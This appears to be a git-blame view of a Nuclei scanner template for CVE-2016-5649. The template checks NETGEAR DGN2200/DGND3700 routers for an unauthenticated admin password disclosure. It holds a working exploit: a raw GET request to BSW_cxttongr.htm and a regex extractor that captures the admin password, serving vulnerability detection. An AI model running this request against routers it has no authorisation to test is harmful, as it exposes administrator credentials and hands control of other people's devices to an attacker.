2021-07-06 16:04:28 +00:00
id : CVE-2016-5649
2021-07-06 14:25:39 +00:00
info :
2021-08-29 06:39:06 +00:00
name : NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
2021-07-06 14:25:39 +00:00
author : suman_kar
severity : critical
2022-05-17 09:18:12 +00:00
description : NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
2022-04-22 10:38:41 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2016-5649
2022-05-17 09:18:12 +00:00
- https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html
- http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2016-5649
cwe-id : CWE-200
2022-04-22 10:38:41 +00:00
tags : cve,cve2016,iot,netgear,router
2021-07-06 14:25:39 +00:00
requests :
- raw :
- |
GET /BSW_cxttongr.htm HTTP/1.1
2021-07-06 16:04:28 +00:00
Host : {{Hostname}}
2021-07-06 14:25:39 +00:00
Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
2021-07-06 16:04:28 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "<title>Smart Wizard Result</title> "
part : body
2021-07-06 14:25:39 +00:00
extractors :
- type : regex
name : password
part : body
2021-07-06 16:04:28 +00:00
group : 1
2021-07-06 14:25:39 +00:00
regex :
2021-09-05 21:13:45 +00:00
- '<b>Success "([a-z]+)"'
2022-05-11 07:58:51 +00:00
# Enhanced by mp on 2022/05/10